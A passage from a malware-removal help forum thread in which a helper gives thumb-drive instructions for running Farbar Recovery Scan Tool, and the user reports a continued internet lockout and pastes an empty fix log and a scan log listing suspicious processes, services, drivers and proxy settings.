  • Transfer both of these files to the root directory of your thumb drive.
  • Do not insert this thumb drive into the sick laptop yet.

 

Open Command Prompt




Now insert the thumb drive into the sick laptop.


Run the Fix script and obtain logs


  • In the Command Prompt window, type Notepad and press Enter.
  • From the notepad menu, press File > Open then navigate to your thumb drive and choose All Files.
  • Right click FRST64 and click Run as administrator.
  • Click Fix.
  • The result of running the script will appear in a file called Fixlog.txt which will be created on your thumb drive in the same location as FRST64.exe.
  • Restart your laptop into normal boot.
  • Right-click FRST64 again on your thumb drive and click Run as administrator.
  • Click Scan.
  • The result of the scan will appear in files called FRST.txt and Addition.txt which will be created on your thumb drive in the same location as FRST64.exe.
  • Insert the thumb drive into your clean PC. Then copy and paste Fixlog.txt, FRST.txt, and Addition.txt into your reply.

 

While in normal boot, test some programs and try to connect to https://www.bleepingcomputer.com/. Don't visit any other sites because we have not reinstalled any antivirus protection yet. Also, I want to see the logs to be sure your machine is safe beyond this limited usage.

In your next reply...

  • Copy and paste the entire contents of Fixlog.txt into the body of your message.
  • Copy and paste the entire contents of FRST.txt and Addition.txt into the body of your message.
  • Please tell me which programs you tried to run. Did they run successfully?
  • Were you able to connect to BleepingComputer? Which browser did you use?
  • Tell me about any unexpected symptoms you saw.

Thank you,

Ray




#22 danban
  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 10 June 2018 - 11:37 AM

Hi Ray,

This is Dan.

I'll get on it tonight and have a reply tomorrow.

Best,

Dan



#23 danban
  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 12 June 2018 - 09:39 AM

Hello Ray,

This is Dan.

I did everything with the command prompt and scanning and fixing with Farbar scan and fix, and did it with the stick drive like you said.

All programs work but that wasn't the problem, I still can't connect to the internet; the blocked yellow menu is still over the internet menu.

All the wifi signals are still running strong but I still can't connect to the internet, both wi-fi and Ethernet cable. I'm still locked out.

Here are the text and logs -

 

Fixlog txt - 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (11-06-2018 21:33:03) Run:1
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
*****************
 
 
 
==== End of Fixlog 21:33:03 ====


#24 danban
  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 12 June 2018 - 09:40 AM

Here's the FRST txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01
Ran by Dan (administrator) on BEATLES (11-06-2018 21:51:39)
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
() C:\ProgramData\dahhService\dahhService.exe
() C:\Program Files\Gramblr\gramblr.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusVibe\AsusVibe2.0.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746
ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4
Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: jefccanc.Daniel-1506042165545
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-06-08]
FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-06-08]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-06-08]
FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff
FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> search.mpc.am
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-06-08]
CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]
CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]
CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]
CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]
CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]
CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]
CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]
CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]
CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]
CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]
CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]
CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]
CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]
CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]
CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]
CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]
CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]
CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]
CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-06-08]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)
 
S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]
S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]
S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]
S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)
U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)
S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)
R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)
R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)
R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)
R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
R3 adhknq; system32\drivers\hknqux.sys [X]
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 21:49 - 2018-06-11 21:49 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-06-11 21:38 - 2018-06-11 21:38 - 000000000 ____D C:\Users\Dan\AppData\Local\vsdkhmb
2018-06-11 21:35 - 2018-06-11 21:35 - 000142672 ____N C:\Windows\system32\Drivers\cooehlor.sys
2018-06-11 21:17 - 2018-06-11 21:17 - 000000000 ____D C:\Users\Dan\AppData\Local\cwkbude
2018-06-11 20:54 - 2018-06-11 20:54 - 000000000 ____D C:\Users\Dan\AppData\Local\ianhgkz
2018-06-11 20:14 - 2018-06-11 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\spnamrh
2018-06-10 20:19 - 2018-06-10 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdhvpka
2018-06-09 19:36 - 2018-06-09 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\psnwzov
2018-06-08 20:22 - 2018-06-08 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\sprxnmw
2018-06-07 20:25 - 2018-06-07 20:25 - 000000000 ____D C:\Users\Dan\AppData\Local\zaothbn
2018-06-06 20:16 - 2018-06-06 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\upcnzih
2018-06-05 20:19 - 2018-06-05 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdavblr
2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe
2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk
2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde
2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo
2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt
2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt
2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw
2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}
2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg
2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw
2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk
